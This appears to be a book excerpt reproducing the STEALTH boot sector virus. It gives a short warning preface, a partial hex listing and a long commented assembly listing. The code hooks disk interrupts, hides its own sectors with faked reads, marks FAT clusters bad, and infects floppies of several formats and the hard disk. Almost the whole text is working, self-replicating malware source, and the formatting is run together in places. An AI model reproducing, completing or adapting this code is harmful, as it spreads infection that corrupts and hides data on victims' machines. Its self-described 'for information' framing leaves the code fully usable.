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WARNING: The STEALTH virus is extremely contagious. Compile any of the following code at your own risk! If your system gets infected with STEALTH, I recommend that you take a floppy boot disk that you are certain is free from infection (borrow one from somebody else if you have to) and turn your computer on with it in your A: drive. Don’t boot off of your hard drive! Next, format your hard drive using your low level hard disk formatter (which should have come with your machine). Then run FDISK and FORMAT to restore your hard disk. Once you have a clean hard disk, format all floppy disks that may have been in your machine during the time it was infected. If there is any question about it, format it. This is the ONLY WAY you are going to get rid of the infection! In other words, unless you really know what you’re doing, you’re probably better off not trying to use this virus.
So the following listings are provided FOR INFORMA-
Here is the HEX listing for STEALTH:
:106F7000E81C057303E9BF00E842057403E9B700A4 :106F8000BB357A8A073C807502B004B303F6E3058B
:1072D000F4E8BB0172358AD0B601B90F4FE8490115 :1072E000722950BF037CBE037AB91900F3A5C60604
Here is the assembly language listing for the STEALTH virus:
;The Stealth Virus is a boot sector virus which remains resident in memory
;after boot so it can infect disks. It hides itself on the disk and includes
;special anti-detection interrupt traps so that it is very difficult to ;locate. This is a very infective and crafty virus.
START:         jmp     BOOT_START
;* BIOS DATA AREA                                                              *
       ORG     413H
MEMSIZE DW      640                     ;size of memory installed, in KB
;* VIRUS CODE STARTS HERE                                                      *
       ORG     7000H
STEALTH:                                ;A label for the beginning of the virus
;Format data consists of Track #, Head #, Sector # and Sector size code (2=512b)
;for every sector on the track. This is put at the very start of the virus so
;that when sectors are formatted, we will not run into a DMA boundary, which
;would cause the format to fail. This is a false error, but one that happens ;with some BIOS’s, so we avoid it by putting this data first.
;FMT_12M:        ;Format data for Track 80, Head 1 on a 1.2 Meg diskette, ;        DB      80,1,1,2, 80,1,2,2, 80,1,3,2, 80,1,4,2, 80,1,5,2, 80,1,6,2
;FMT_360:        ;Format data for Track  40, Head 1 on a 360K diskette
;        DB      40,1,1,2, 40,1,2,2, 40,1,3,2, 40,1,4,2, 40,1,5,2, 40,1,6,2
;* INTERRUPT 13H HANDLER                                                       *
;******************************************************************************* OLD_13H DD      ?                       ;Old interrupt 13H vector goes here
INT_13H:         sti         cmp     ah,2                    ;we want to intercept reads         jz      READ_FUNCTION         cmp     ah,3                    ;and writes to all disks         jz      WRITE_FUNCTION I13R:   jmp     DWORD PTR cs:[OLD_13H]
;This section of code handles all attempts to access the Disk BIOS Function 2, ;(Read). It checks for several key situations where it must jump into action. ;they are:
;       1) If an attempt is made to read the boot sector, it must be processed
;          through READ_BOOT, so an infected boot sector is never seen. Instead, ;          the original boot sector is read.
;       2) If any of the infected sectors, Track 0, Head 0, Sector 2-7 on
;          drive C are read, they are processed by READ_HARD, so the virus
;          code is never seen on the hard drive.
;       3) If an attempt is made to read the boot sector on the floppy,
;          this routine checks to see if the floppy has already been ;          infected, and if not, it goes ahead and infects it.
READ_FUNCTION:                                  ;Disk Read Function Handler         cmp     dh,0                            ;is it head 0?
       jnz     I13R                            ;nope, let BIOS handle it         cmp     ch,0                            ;is it track 0?
       jnz     I13R                            ;no, let BIOS handle it         cmp     cl,1                            ;track 0, is it sector 1         jz      READ_BOOT                       ;yes, go handle boot sector read         cmp     dl,80H                          ;no, is it hard drive c:?         jnz     I13R                            ;no, let BIOS handle it         cmp     cl,8                            ;sector < 8?
       jnc     I13R                            ;nope, let BIOS handle it         jmp     READ_HARD                       ;yes, divert read on the C drive
;This section of code handles all attempts to access the Disk BIOS Function 3, ;(Write). It checks for two key situations where it must jump into action. They ;are:
;       1) If an attempt is made to write the boot sector, it must be processed ;          through WRITE_BOOT, so an infected boot sector is never overwritten.
;          instead, the write is redirected to where the original boot sector is ;          hidden.
;       2) If any of the infected sectors, Track 0, Head 0, Sector 2-7 on
;          drive C are written, they are processed by WRITE_HARD, so the virus ;          code is never overwritten.
WRITE_FUNCTION:                                 ;BIOS Disk Write Function         cmp     dh,0                            ;is it head 0?
       jnz     I13R                            ;nope, let BIOS handle it         cmp     ch,0                            ;is it track 0?         jnz     I13R                            ;nope, let BIOS handle it         cmp     cl,1                            ;is it sector 1         jnz     WF1                             ;nope, check for hard drive         jmp     WRITE_BOOT                      ;yes, go handle boot sector read WF1:    cmp     dl,80H                          ;is it the hard drive c: ?         jnz     I13R                            ;no, another hard drive         cmp     cl,8                            ;sector < 8?
       jnc     I13R                            ;nope, let BIOS handle it         jmp     WRITE_HARD                      ;else take care of writing to C:
;This section of code handles reading the boot sector. There are three
;possibilities: 1) The disk is not infected, in which case the read should be
;passed directly to BIOS, 2) The disk is infected and only one sector is
;requested, in which case this routine figures out where the original boot
;sector is and reads it, and 3) The disk is infected and more than one sector
;is requested, in which case this routine breaks the read up into two calls to
;the ROM BIOS, one to fetch the original boot sector, and another to fetch the
;additional sectors being read. One of the complexities in this last case is
;that the routine must return the registers set up as if only one read had ;been performed.
;  To determine if the disk is infected, the routine reads the real boot sector
;into SCRATCHBUF and calls IS_VBS. If that returns affirmative (z set), then
;this routine goes to get the original boot sector, etc., otherwise it calls ROM
;BIOS and allows a second read to take place to get the boot sector into the ;requested buffer at es:bx.
       cmp     dl,80H                          ;check if we must infect first         jnc     RDBOOT                          ;don’t need to infect hard dsk         call    CHECK_DISK                      ;is floppy already infected?         jz      RDBOOT                          ;yes, go do read         call    INFECT_FLOPPY                   ;no, go infect the diskette RDBOOT: push    ax                              ;now perform a redirected read         push    bx                              ;save registers         push    cx
       push    dx         push    ds         push    es         push    bp
       push    cs                              ;set ds=es=cs         pop     es         push    cs         pop     ds
       mov     bp,sp                           ;and bp=sp
RB001:  mov     al,dl         call    GET_BOOT_SEC                    ;read the real boot sector         jnc     RB01                            ;ok, go on         call    GET_BOOT_SEC                    ;do it again to make sure         jnc     RB01                            ;ok, go on
       jmp     RB_GOON                         ;error, let BIOS return err code RB01:   call    IS_VBS                          ;is it the viral boot sector?         jz      RB02                            ;yes, jump
       jmp     RB_GOON                         ;no, let ROM BIOS read sector RB02:;  mov     bx,OFFSET SCRATCHBUF + (OFFSET DR_FLAG - OFFSET BOOT_START)         mov     bx,OFFSET SB_DR_FLAG            ;required instead of ^ for a86
       mov     al,BYTE PTR [bx]                ;get disk type of disk being         cmp     al,80H                          ;read, and make an index of it         jnz     RB1         mov     al,4 RB1:    mov     bl,3                            ;to look up location of boot sec         mul     bl         add     ax,OFFSET BOOT_SECTOR_LOCATION  ;ax=@BOOT_SECTOR_LOCATION table         mov     bx,ax         mov     ch,[bx]                         ;get track of orig boot sector         mov     dh,[bx+1]                       ;get head of orig boot sector         mov     cl,[bx+2]                       ;get sector of orig boot sector         mov     dl,ss:[bp+6]                    ;get drive from original spec         mov     bx,ss:[bp+10]                   ;get read buffer offset         mov     ax,ss:[bp+2]                    ;and segment         mov     es,ax                           ;from original specification         mov     ax,201H                         ;prepare to read 1 sector         pushf         call    DWORD PTR [OLD_13H]             ;do BIOS int 13H         mov     al,ss:[bp+12]                   ;see if original request         cmp     al,1                            ;was for more than one sector         jz      RB_EXIT                         ;no, go exit
READ_1NEXT:                                     ;more than 1 sec requested, so         pop     bp                              ;read the rest as a second call         pop     es                              ;to BIOS         pop     ds         pop     dx                              ;first restore these registers         pop     cx         pop     bx         pop     ax
       add     bx,512                          ;prepare to call BIOS for         push    ax                              ;balance of read         dec     al                              ;get registers straight for it         inc     cl
       cmp     dl,80H                          ;is it the hard drive?         jnz     RB15                            ;nope, go handle floppy
       push    bx                              ;handle an infected hard drive         push    cx                              ;by faking read on extra sectors         push    dx                              ;and returning a block of 0’s         push    si         push    di         push    ds         push    bp
       push    es         pop     ds                              ;ds=es         mov     BYTE PTR [bx],0                 ;set first byte in buffer = 0         mov     si,bx         mov     di,bx         inc     di         mov     ah,0                            ;ax=number of sectors to read         mov     bx,512                          ;bytes per sector         mul     bx                              ;# of bytes to read in dx:ax<64K         mov     cx,ax         dec     cx                              ;number of bytes to move in cx         rep     movsb                           ;fill buffer with 0’s
       clc                                     ;clear c, fake read successful         pushf                                   ;then restore everyting properly         pop     ax                              ;first set flag register         mov     ss:[bp+20],ax                   ;as stored on the stack         pop     bp                              ;and pop all registers         pop     ds         pop     di         pop     si         pop     dx         pop     cx         pop     bx         pop     ax         mov     ah,0         dec     cl         sub     bx,512
       iret                                    ;and get out
RB15:                                           ;read next sectors on floppy         pushf                                   ;call BIOS to         call    DWORD PTR cs:[OLD_13H]          ;read the rest (must use cs)         push    ax         push    bp         mov     bp,sp         pushf                                   ;use c flag from BIOS call         pop     ax                              ;to set c flag on the stack         mov     ss:[bp+10],ax         jc      RB2                             ;if error, return ah from 2nd rd         sub     bx,512                          ;else restore registers so         dec     cl                              ;it looks as if only one read         pop     bp                              ;was performed         pop     ax         pop     ax                              ;and exit with ah=0 to indicate         mov     ah,0                            ;successful read         iret
RB2:    pop     bp                              ;error on 2nd read         pop     ax                              ;so clean up stack         add     sp,2                            ;and get out         iret
RB_EXIT:                                        ;exit from single sector read         mov     ax,ss:[bp+18]                   ;set the c flag on the stack         push    ax                              ;to indicate successful read         popf         clc         pushf         pop     ax         mov     ss:[bp+18],ax         pop     bp                              ;restore all registers         pop     es         pop     ds         pop     dx         pop     cx         pop     bx         pop     ax         mov     ah,0
       iret                                    ;and get out
RB_GOON:                                        ;This passes control to BIOS         pop     bp                              ;for uninfected disks
       pop     es                              ;just restore all registers to         pop     ds                              ;their original values         pop     dx         pop     cx         pop     bx         pop     ax         jmp     I13R                            ;and go jump to BIOS
;This table identifies where the original boot sector is located for each
;of the various disk types. It is used by READ_BOOT and WRITE_BOOT to redirect ;boot sector reads and writes.
       DB      39,1,9                          ;Track, head, sector, 360K drive
       DB      79,1,15                         ;1.2M drive
       DB      79,1,9                          ;720K drive
       DB      79,1,18                         ;1.44M drive
       DB      0,0,7                           ;Hard drive
;This routine handles writing the boot sector for all disks. It checks to see ;if the disk has been infected, and if not, allows BIOS to handle the write.
;If the disk is infected, this routine redirects the write to put the boot
;sector being written in the reserved area for the original boot sector. It ;must also handle the writing of multiple sectors properly, just as READ_BOOT ;did.
WRITE_BOOT:         push    ax                              ;save everything we might change         push    bx         push    cx         push    dx         push    ds         push    es         push    bp         mov     bp,sp
       push    cs                              ;ds=es=cs         pop     ds         push    cs         pop     es
       mov     al,dl         call    GET_BOOT_SEC                    ;read the real boot sector         jnc     WB01         call    GET_BOOT_SEC                    ;do it again if first failed         jnc     WB01
       jmp     WB_GOON                         ;error on read, let BIOS take it WB01:   call    IS_VBS                          ;else, is disk infected?         jz      WB02                            ;yes
       jmp     WB_GOON                         ;no, let ROM BIOS write sector WB02:;  mov     bx,OFFSET SCRATCHBUF + (OFFSET DR_FLAG - OFFSET BOOT_START)         mov     bx,OFFSET SB_DR_FLAG            ;required instead of ^ for a86
       mov     al,BYTE PTR [bx]         cmp     al,80H                          ;infected, so redirect the write         jnz     WB1
       mov     al,4                            ;make an index of the drive type WB1:    mov     bl,3         mul     bl         add     ax,OFFSET BOOT_SECTOR_LOCATION  ;ax=@table entry         mov     bx,ax
       mov     ch,[bx]                         ;get the location of original         mov     dh,[bx+1]                       ;boot sector on disk         mov     cl,[bx+2]                       ;prepare for the write         mov     dl,ss:[bp+6]         mov     bx,ss:[bp+10]         mov     ax,ss:[bp+2]         mov     es,ax
       mov     ax,301H         pushf         call    DWORD PTR [OLD_13H]             ;and do it         sti         mov     dl,ss:[bp+6]         cmp     dl,80H                          ;was write going to hard drive?         jnz     WB_15                           ;no         mov     BYTE PTR [DR_FLAG],80H          ;yes, update partition info         push    si         push    di         mov     di,OFFSET PART                  ;just move it from sec we just         mov     si,ss:[bp+10]                   ;wrote into the viral boot sec         add     si,OFFSET PART         sub     si,OFFSET BOOT_START         push    es         pop     ds         push    cs         pop     es                              ;switch ds and es around         mov     cx,20
       rep     movsw                           ;and do the move         push    cs         pop     ds         mov     ax,301H         mov     bx,OFFSET BOOT_START         mov     cx,1                            ;Track 0, Sector 1         mov     dx,80H                          ;drive 80H, Head 0         pushf                                   ;go write updated viral boot sec         call    DWORD PTR [OLD_13H]             ;with new partition info         pop     di                              ;clean up         pop     si
WB_15:  mov     al,ss:[bp+12]         cmp     al,1                            ;was write more than 1 sector?         jz      WB_EXIT                         ;if not, then exit
WRITE_1NEXT:                                    ;more than 1 sector         mov     dl,ss:[bp+6]                    ;see if it’s the hard drive         cmp     dl,80H         jz      WB_EXIT                         ;if so, ignore rest of the write         pop     bp                              ;floppy drive, go write the rest         pop     es                              ;as a second call to BIOS         pop     ds         pop     dx         pop     cx                              ;restore all registers         pop     bx         pop     ax         add     bx,512                          ;and modify a few to         push    ax                              ;drop writing the first sector         dec     al         inc     cl         pushf         call    DWORD PTR cs:[OLD_13H]          ;go write the rest         sti         push    ax         push    bp         mov     bp,sp         pushf                                   ;use c flag from call         pop     ax                              ;to set c flag on the stack         mov     ss:[bp+10],ax         jc      WB2                             ;an error                                                 ;so exit with ah from 2nd int 13         sub     bx,512         dec     cl         pop     bp         pop     ax
       pop     ax                              ;else exit with ah=0         mov     ah,0                            ;to indicate success         iret
WB2:    pop     bp                              ;exit with ah from 2nd         pop     ax                              ;interrupt         add     sp,2
WB_EXIT:                                        ;exit after 1st write         mov     ax,ss:[bp+18]                   ;set carry on stack to indicate         push    ax                              ;a successful write operation         popf         clc         pushf         pop     ax         mov     ss:[bp+18],ax         pop     bp                              ;restore all registers and exit         pop     es         pop     ds         pop     dx         pop     cx         pop     bx         pop     ax         mov     ah,0         iret
WB_GOON:                                        ;pass control to ROM BIOS         pop     bp                              ;just restore all registers         pop     es         pop     ds         pop     dx         pop     cx         pop     bx         pop     ax         jmp     I13R                            ;and go do it
;Read hard disk sectors on Track 0, Head 0, Sec > 1. If the disk is infected,
;then instead of reading the true data there, return a block of 0’s, since
;0 is the data stored in a freshly formatted but unused sector. This will ;fake the caller out and keep him from knowing that the virus is hiding there.
;If the disk is not infected, return the true data stored in those sectors.
READ_HARD:         call    CHECK_DISK                      ;see if disk is infected         jnz     RWH_EX                          ;no, let BIOS handle the read         push    ax                              ;else save registers         push    bx         push    cx         push    dx         push    si         push    di         push    ds         push    bp         mov     bp,sp         mov     BYTE PTR es:[bx],0              ;zero the first byte in the blk         push    es         pop     ds         mov     si,bx                           ;set up es:di and ds:si         mov     di,bx                           ;for a transfer         inc     di         mov     ah,0                            ;ax=number of sectors to read         mov     bx,512                          ;bytes per sector         mul     bx                              ;number of bytes to read in ax         mov     cx,ax         dec     cx                              ;number of bytes to move         rep     movsb                           ;do fake read of all 0’s
       mov     ax,ss:[bp+20]                   ;now set c flag         push    ax                              ;to indicate succesful read         popf         clc         pushf         pop     ax         mov     ss:[bp+20],ax
       pop     bp                              ;restore everything and exit         pop     ds         pop     di         pop     si         pop     dx         pop     cx         pop     bx         pop     ax         mov     ah,0                            ;set to indicate successful read         iret RWH_EX: jmp     I13R                            ;pass control to BIOS
;Handle writes to hard disk Track 0, Head 0, 1<Sec<8. We must stop the write if
;the disk is infected. Instead, fake the return of an error by setting carry ;and returning ah=4 (sector not found).
       call    CHECK_DISK                      ;see if the disk is infected         jnz     RWH_EX                          ;no, let BIOS handle it all         push    bp                              ;yes, infected, so . . .
       push    ax         mov     bp,sp         mov     ax,ss:[bp+8]                    ;get flags off of stack         push    ax         popf                                    ;put them in current flags         stc                                     ;set the carry flag         pushf         pop     ax         mov     ss:[bp+8],ax                    ;and put flags back on stack         pop     ax         mov     ah,4                            ;set up sector not found error         pop     bp         iret                                    ;and get out of ISR
;See if disk dl is infected already. If so, return with Z set. This
;does not assume that registers have been saved, and saves/restores everything ;but the flags.
CHECK_DISK:         push    ax                              ;save everything         push    bx         push    cx         push    dx         push    ds         push    es         push    cs         pop     ds         push    cs         pop     es         mov     al,dl
       call    GET_BOOT_SEC                    ;read the boot sector         jnc     CD1         xor     al,al                           ;act as if infected         jmp     SHORT CD2                       ;in the event of an error CD1:    call    IS_VBS                          ;see if viral boot sec (set z) CD2:    pop     es                              ;restore everything         pop     ds                              ;except the z flag         pop     dx         pop     cx         pop     bx         pop     ax         ret
;This routine determines from the boot sector parameters what kind of floppy
;disk is in the drive being accessed, and calls the proper infection routine
;to infect the drive. It has no safeguards to prevent infecting an already
;infected disk. the routine CHECK_DISK must be called first to make sure you
;want to infect before you go and do it. This restores all registers to their ;initial state.
INFECT_FLOPPY:         pushf                                   ;save everything         push    si         push    di         push    ax         push    bx         push    cx         push    dx         push    ds         push    es         push    cs         pop     es         push    cs         pop     ds         sti         mov     bx,OFFSET SCRATCHBUF + 13H      ;@ of sec cnt in boot sector         mov     bx,[bx]                         ;get sector count for this disk         mov     al,dl         cmp     bx,720                          ;is it 360K? (720 sectors)         jnz     IF_1                            ;no, try another possibility         call    INFECT_360K                     ;yes, infect it         jmp     SHORT IF_R                      ;and get out IF_1:   cmp     bx,2400                         ;is it 1.2M? (2400 sectors)         jnz     IF_2                            ;no, try another possibility         call    INFECT_12M                      ;yes, infect it         jmp     SHORT IF_R                      ;and get out IF_2:   cmp     bx,1440                         ;is it 720K 3 1/2"? (1440 secs)         jnz     IF_3                            ;no, try another possibility         call    INFECT_720K                     ;yes, infect it         jmp     SHORT IF_R                      ;and get out IF_3:   cmp     bx,2880                         ;is it 1.44M 3 1/2"? (2880 secs)         jnz     IF_R                            ;no - don’t infect this disk         call    INFECT_144M                     ;yes - infect it IF_R:   pop     es                              ;restore everyting and return         pop     ds         pop     dx         pop     cx         pop     bx         pop     ax         pop     di         pop     si         popf         ret
;Infect a 360 Kilobyte drive. This is done by formatting Track 40, Head 0,
;Sectors 1 to 6, putting the present boot sector in Sector 6 with the virus
;code in sectors 1 through 5, and then replacing the boot sector on the disk ;with the viral boot sector.
INFECT_360K:         mov     dl,al                           ;read the FAT from         mov     cx,3                            ;track 0, sector 3, head 0         mov     dh,0         call    READ_DISK         mov     bx,ax         jc      INF360_EXIT
       mov     di,OFFSET SCRATCHBUF + 11H      ;modify the FAT in RAM         mov     ax,[di]                         ;make sure nothing is stored         and     ax,0FFF0H         or      ax,[di+2]                       ;if it is, abort infect...         or      ax,[di+4]                       ;don’t wipe out any data         jnz     INF360_EXIT                     ;if so, abort infection         mov     ax,[di]
       or      ax,0FF70H         stosw         mov     ax,07FF7H                       ;marking the last 6 clusters         stosw                                   ;as bad         mov     ax,00FFH         stosw
       mov     ax,bx                           ;write the FAT back to disk         mov     cx,3                            ;at track 0, sector 3, head 0         mov     dl,bl         mov     dh,0         call    WRITE_DISK                      ;write the FAT back to disk         jc      INF360_EXIT INF360_RETRY:         mov     dl,al                           ;write the 2nd FAT too,         mov     cx,5                            ;at track 0, sector 5, head 0         mov     dh,0         call    WRITE_DISK
       jc      INF360_RETRY                    ;must retry, since 1st fat done
       call    GET_BOOT_SEC                    ;read the boot sector in         jc      INF360_EXIT
       mov     dl,al                           ;write the orig boot sector at         mov     dh,1                            ;head 1         mov     cx,2709H                        ;track 39, sector 9         call    WRITE_DISK         jc      INF360_EXIT
       push    ax         mov     di,OFFSET BOOT_DATA ;       mov     si,OFFSET SCRATCHBUF + (OFFSET BOOT_DATA - OFFSET BOOT_START)         mov     si,OFFSET SB_BOOT_DATA          ;required instead of ^ for A86
       mov     cx,32H / 2                      ;copy boot sector disk info over         rep     movsw                           ;to new boot sector         mov     BYTE PTR [DR_FLAG],0            ;set proper diskette type         pop     ax
       call    PUT_BOOT_SEC                    ;go write it to disk         jc      INF360_EXIT
       mov     bx,OFFSET STEALTH               ;buffer for 5 sectors of stealth         mov     dl,al                           ;drive to write to         mov     dh,1                            ;head 1         mov     cx,2704H                        ;track 39, sector 4         mov     ax,0305H                        ;write 5 sectors         pushf
       call    DWORD PTR [OLD_13H]             ;(int 13H) INF360_EXIT:         ret                                     ;all done
;Infect 1.2 megabyte Floppy Disk Drive AL with this virus. This is essentially ;the same as the 360K case.
INFECT_12M:         mov     dl,al                           ;read the FAT from         mov     cx,8                            ;track 0, sector 8, head 0         mov     dh,0         call    READ_DISK         mov     bx,ax         jc      INF12M_EXIT
       mov     di,OFFSET SCRATCHBUF + 1DDH     ;modify the FAT in RAM         mov     ax,[di]                         ;make sure nothing is stored         or      ax,[di+2]                       ;if it is, abort infect...         or      ax,[di+4]                       ;don’t wipe out any data         or      ax,[di+6]         or      ax,[di+8]         jnz     INF12M_EXIT                     ;if so, abort infection
       mov     ax,07FF7H         stosw         mov     ax,0F7FFH                       ;marking the last 6 clusters         stosw                                   ;as bad         mov     ax,0FF7FH         stosw         mov     ax,07FF7H         stosw         mov     ax,000FFH         stosw
       mov     ax,bx                           ;write the FAT back to disk         mov     cx,8                            ;at track 0, sector 8, head 0         mov     dl,bl         mov     dh,0         call    WRITE_DISK                      ;write the FAT back to disk         jc      INF12M_EXIT INF12M_RETRY:         mov     dl,al                           ;write the 2nd FAT too,         mov     cx,0FH                          ;at track 0, sector 15, head 0         mov     dh,0         call    WRITE_DISK         jc      INF12M_RETRY                    ;must retry, since 1st fat done
       call    GET_BOOT_SEC                    ;read the boot sector in         jc      INF12M_EXIT
       mov     dl,al                           ;write the orig boot sector at         mov     dh,1                            ;head 1         mov     cx,4F0FH                        ;track 79, sector 15         call    WRITE_DISK         jc      INF12M_EXIT
       push    ax         mov     di,OFFSET BOOT_DATA ;       mov     si,OFFSET SCRATCHBUF + (OFFSET BOOT_DATA - OFFSET BOOT_START)         mov     si,OFFSET SB_BOOT_DATA          ;required instead of ^ for A86
       mov     cx,32H / 2                      ;copy boot sector disk info over         rep     movsw                           ;to new boot sector         mov     BYTE PTR [DR_FLAG],1            ;set proper diskette type         pop     ax
       call    PUT_BOOT_SEC                    ;go write it to disk         jc      INF12M_EXIT
       mov     bx,OFFSET STEALTH               ;buffer for 5 sectors of stealth         mov     dl,al                           ;drive to write to         mov     dh,1                            ;head 1         mov     cx,4F0AH                        ;track 79, sector 10         mov     ax,0305H                        ;write 5 sectors         pushf
       call    DWORD PTR [OLD_13H]             ;(int 13H) INF12M_EXIT:         ret                                     ;all done
;Infect a 3 1/2" 720K drive. This process is a little different than for 5 1/4"
;drives. The virus goes in an existing data area on the disk, so no formatting
;is required. Instead, we 1) Mark the diskette’s FAT to indicate that the last
;three clusters are bad, so that DOS will not attempt to overwrite the virus
;code. 2) Read the boot sector and put it at Track 79, Head 1 sector 9, 3) Put
;the five sectors of stealth routines at Track 79, Head 1, sector 4-8, 4) Put ;the viral boot sector at Track 0, Head 0, Sector 1.
INFECT_720K:         mov     dl,al                           ;read the FAT from         mov     cx,4                            ;track 0, sector 4, head 0         mov     dh,0         call    READ_DISK         mov     bx,ax         jc      INF720_EXIT
       mov     di,OFFSET SCRATCHBUF + 44       ;modify the FAT in RAM         mov     ax,[di]                         ;make sure nothing is stored         or      ax,[di+2]                       ;if it is, abort infect...         or      ax,[di+4]                       ;don’t wipe out any data         jnz     INF720_EXIT                     ;if so, abort infection
       mov     ax,07FF7H         stosw         mov     ax,0F7FFH                       ;marking the last 6 clusters         stosw                                   ;as bad         mov     ax,0000FH         stosw
       mov     ax,bx                           ;write the FAT back to disk         mov     cx,4                            ;at track 0, sector 4, head 0         mov     dl,bl         mov     dh,0         call    WRITE_DISK                      ;write the FAT back to disk         jc      INF720_EXIT INF720_RETRY:         mov     dl,al                           ;write the 2nd FAT too,         mov     cx,7                            ;at track 0, sector 7, head 0         mov     dh,0         call    WRITE_DISK         jc      INF720_RETRY                    ;must retry, since 1st fat done
       call    GET_BOOT_SEC                    ;read the boot sector in         jc      INF720_EXIT
       mov     dl,al                           ;write the orig boot sector at         mov     dh,1                            ;head 1         mov     cx,4F09H                        ;track 79, sector 9         call    WRITE_DISK         jc      INF720_EXIT
       push    ax         mov     di,OFFSET BOOT_DATA ;       mov     si,OFFSET SCRATCHBUF + (OFFSET BOOT_DATA - OFFSET BOOT_START)         mov     si,OFFSET SB_BOOT_DATA          ;required instead of ^ for A86
       mov     cx,32H / 2                      ;copy boot sector disk info over         rep     movsw                           ;to new boot sector         mov     BYTE PTR [DR_FLAG],2            ;set proper diskette type         pop     ax
       call    PUT_BOOT_SEC                    ;go write it to disk         jc      INF720_EXIT
       mov     bx,OFFSET STEALTH               ;buffer for 5 sectors of stealth         mov     dl,al                           ;drive to write to         mov     dh,1                            ;head 1         mov     cx,4F04H                        ;track 79, sector 4         mov     ax,0305H                        ;write 5 sectors         pushf
       call    DWORD PTR [OLD_13H]             ;(int 13H) INF720_EXIT:         ret                                     ;all done
;This routine infects a 1.44 megabyte 3 1/2" diskette. It is essentially the
;same as infecting a 720K diskette, except that the virus is placed in sectors ;13-17 on Track 79, Head 0, and the original boot sector is placed in Sector 18.
INFECT_144M:         mov     dl,al                           ;read the FAT from         mov     cx,0AH                          ;track 0, sector 10, head 0         mov     dh,0         call    READ_DISK         mov     bx,ax         jc      INF720_EXIT
       mov     di,OFFSET SCRATCHBUF + 0A8H     ;modify the FAT in RAM         mov     ax,[di]                         ;make sure nothing is stored         and     ax,0FFF0H                       ;in any of these clusters         or      ax,[di+2]                       ;if it is, abort infect...         or      ax,[di+4]                       ;don’t wipe out any data         or      ax,[di+6]         or      ax,[di+8]         jnz     INF144M_EXIT                    ;if so, abort infection
       mov     ax,es:[di]         and     ax,000FH         add     ax,0FF70H         stosw         mov     ax,07FF7H                       ;marking the last 6 clusters         stosw                                   ;as bad         mov     ax,0F7FFH         stosw         mov     ax,0FF7FH         stosw         mov     ax,0FF7H         stosw
       mov     ax,bx                           ;write the FAT back to disk         mov     cx,0AH                          ;at track 0, sector 10, head 0         mov     dl,bl         mov     dh,0         call    WRITE_DISK                      ;write the FAT back to disk         jc      INF144M_EXIT INF144M_RETRY:         mov     dl,al                           ;write the 2nd FAT too,         mov     cx,1                            ;at track 0, sector 1, head 1         mov     dh,1         call    WRITE_DISK         jc      INF144M_RETRY                   ;must retry, since 1st fat done
       call    GET_BOOT_SEC                    ;read the boot sector in         jc      INF144M_EXIT
       mov     dl,al                           ;write the orig boot sector at         mov     dh,1                            ;head 1         mov     cx,4F12H                        ;track 79, sector 18         call    WRITE_DISK         jc      INF144M_EXIT
       push    ax         mov     di,OFFSET BOOT_DATA ;       mov     si,OFFSET SCRATCHBUF + (OFFSET BOOT_DATA - OFFSET BOOT_START)         mov     si,OFFSET SB_BOOT_DATA          ;required instead of ^ for A86
       mov     cx,32H / 2                      ;copy boot sector disk info over         rep     movsw                           ;to new boot sector         mov     BYTE PTR [DR_FLAG],3            ;set proper diskette type         pop     ax
       call    PUT_BOOT_SEC                    ;go write it to disk         jc      INF144M_EXIT
       mov     bx,OFFSET STEALTH               ;buffer for 5 sectors of stealth         mov     dl,al                           ;drive to write to         mov     dh,1                            ;head 1         mov     cx,4F0DH                        ;track 79, sector 13         mov     ax,0305H                        ;write 5 sectors         pushf
       call    DWORD PTR [OLD_13H]             ;(int 13H) INF144M_EXIT:         ret                                     ;all done
;Read one sector into SCRATCHBUF from the location specified in dx,cx. Preserve ;ax, and return c set properly. Assumes es set up properly. READ_DISK:
       push    ax         mov     bx,OFFSET SCRATCHBUF         mov     ax,0201H         pushf         call    DWORD PTR [OLD_13H]         pop     ax         ret
;Write one sector from SCRATCHBUF into the location specified in dx,cx. Preserve ;ax, and return c set properly. WRITE_DISK:
       push    ax         mov     bx,OFFSET SCRATCHBUF         mov     ax,0301H         pushf         call    DWORD PTR [OLD_13H]         pop     ax         ret
;******************************************************************************* ;Infect Hard Disk Drive AL with this virus. This involves the following steps:
;A) Read the present boot sector. B) Copy it to Track 0, Head 0, Sector 7.
;C) Copy the disk parameter info into the viral boot sector in memory. D) Copy
;the viral boot sector to Track 0, Head 0, Sector 1. E) Copy the STEALTH ;routines to Track 0, Head 0, Sector 2, 5 sectors total.
INFECT_HARD:         mov     al,80H                          ;set drive type flag to hard disk         mov     BYTE PTR [DR_FLAG],al           ;cause that’s where it’s going         call    GET_BOOT_SEC                    ;read the present boot sector
       mov     bx,OFFSET SCRATCHBUF            ;and go write it at         push    ax         mov     dl,al         mov     dh,0                            ;head 0         mov     cx,0007H                        ;track 0, sector 7         mov     ax,0301H                        ;BIOS write, for 1 sector         pushf         call    DWORD PTR [OLD_13H]             ;(int 13H)         pop     ax
       push    ax         mov     di,OFFSET BOOT_DATA ;       mov     si,OFFSET SCRATCHBUF + (OFFSET BOOT_DATA - OFFSET BOOT_START)         mov     si,OFFSET SB_BOOT_DATA          ;required instead of ^ for A86
       mov     cx,32H / 2                      ;copy boot sector disk info over         rep     movsw                           ;to new boot sector         mov     di,OFFSET BOOT_START + 200H - 42H         mov     si,OFFSET SCRATCHBUF + 200H - 42H         mov     cx,21H                          ;copy partition table         rep     movsw                           ;to new boot sector too!         pop     ax         call    PUT_BOOT_SEC                    ;write viral boot sector
       mov     bx,OFFSET STEALTH               ;buffer for 5 sectors of stealth         mov     dl,al                           ;drive to write to         mov     dh,0                            ;head 0         mov     cx,0002H                        ;track 0, sector 2         mov     ax,0305H                        ;write 5 sectors         pushf         call    DWORD PTR [OLD_13H]             ;(int 13H)         ret
;This routine determines if a hard drive C: exists, and returns NZ if it does, ;Z if it does not.
       push    ds         xor     ax,ax         mov     ds,ax         mov     bx,475H                         ;Get hard disk count from bios         mov     al,[bx]                         ;put it in al         pop     ds         cmp     al,0                            ;and see if al=0 (no drives)         ret
;Read the boot sector on the drive AL into SCRATCHBUF. This routine must ;prserve AL!
       push    ax         mov     bx,OFFSET SCRATCHBUF            ;buffer for the boot sector         mov     dl,al                           ;this is the drive to read from         mov     dh,0                            ;head 0         mov     ch,0                            ;track 0         mov     cl,1                            ;sector 1         mov     al,1                            ;read 1 sector         mov     ah,2                            ;BIOS read function         pushf         call    DWORD PTR [OLD_13H]             ;(int 13H)         pop     ax         ret
;This routine writes the data in BOOT_START to the drive in al at Track 0, ;Head 0, Sector 1 for 1 sector, making that data the new boot sector.
